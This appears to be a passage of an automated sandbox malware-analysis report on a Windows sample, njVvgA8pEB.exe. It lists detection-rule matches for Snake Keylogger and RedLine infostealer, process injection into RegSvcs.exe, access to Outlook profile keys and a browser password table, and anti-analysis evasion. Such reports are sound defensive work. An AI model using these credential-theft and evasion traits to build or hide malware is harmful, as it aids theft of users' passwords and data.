              Source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.njVvgA8pEB.exe.1400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.1722801122.0000000000FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000003.00000002.4183734715.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.1740251386.0000000001400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@3/3
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037A06A GetLastError,FormatMessageW,0_2_0037A06A
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003681CB AdjustTokenPrivileges,CloseHandle,0_2_003681CB
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003687E1
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0037B333
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0038EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0038EE0D
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003883BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_003883BB
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00314E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00314E89
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeFile created: C:\Users\user\AppData\Local\Temp\autE508.tmpJump to behavior
              Source: njVvgA8pEB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: RegSvcs.exe, 00000003.00000002.4187157369.00000000033FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4187157369.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4187157369.00000000033F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: njVvgA8pEB.exeVirustotal: Detection: 61%
              Source: njVvgA8pEB.exeReversingLabs: Detection: 71%
              Source: unknownProcess created: C:\Users\user\Desktop\njVvgA8pEB.exe "C:\Users\user\Desktop\njVvgA8pEB.exe"
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\njVvgA8pEB.exe"
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeProcess created: C:\Users\user\Desktop\njVvgA8pEB.exe "C:\Users\user\Desktop\njVvgA8pEB.exe"
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\njVvgA8pEB.exe"
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\njVvgA8pEB.exe"Jump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeProcess created: C:\Users\user\Desktop\njVvgA8pEB.exe "C:\Users\user\Desktop\njVvgA8pEB.exe"Jump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\njVvgA8pEB.exe"Jump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: njVvgA8pEB.exeStatic file information: File size 1118720 > 1048576
              Source: njVvgA8pEB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: njVvgA8pEB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: njVvgA8pEB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: njVvgA8pEB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: njVvgA8pEB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: njVvgA8pEB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: njVvgA8pEB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: njVvgA8pEB.exe, 00000000.00000003.1720188665.0000000003940000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000000.00000003.1720346942.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1736838584.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1731957014.0000000003D30000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: njVvgA8pEB.exe, 00000000.00000003.1720188665.0000000003940000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000000.00000003.1720346942.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1736838584.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1731957014.0000000003D30000.00000004.00001000.00020000.00000000.sdmp
              Source: njVvgA8pEB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: njVvgA8pEB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: njVvgA8pEB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: njVvgA8pEB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: njVvgA8pEB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00314B37 LoadLibraryA,GetProcAddress,0_2_00314B37
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037848F push FFFFFF8Bh; iretd 0_2_00378491
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0033E70F push edi; ret 0_2_0033E711
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0033E828 push esi; ret 0_2_0033E82A
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00338945 push ecx; ret 0_2_00338958
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0033EA03 push esi; ret 0_2_0033EA05
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0033EAEC push edi; ret 0_2_0033EAEE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C40C push cs; iretd 3_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00423149 push eax; ret 3_2_00423179
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C50E push cs; iretd 3_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004231C8 push eax; ret 3_2_00423179
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040E21D push ecx; ret 3_2_0040E230
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C6BE push ebx; ret 3_2_0041C6BF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040BB97 push dword ptr [ecx-75h]; iretd 3_2_0040BBA3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011D46A1 push ebx; iretd 3_2_011D46A2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_03249877 push dword ptr [ebp+ecx-75h]; retf 3_2_03249882
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_032498E9 push dword ptr [ebp+ebx-75h]; iretd 3_2_032498ED
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003148D7
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00395376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00395376
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00333187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00333187
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTR
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeAPI/Special instruction interceptor: Address: 12FA3C4
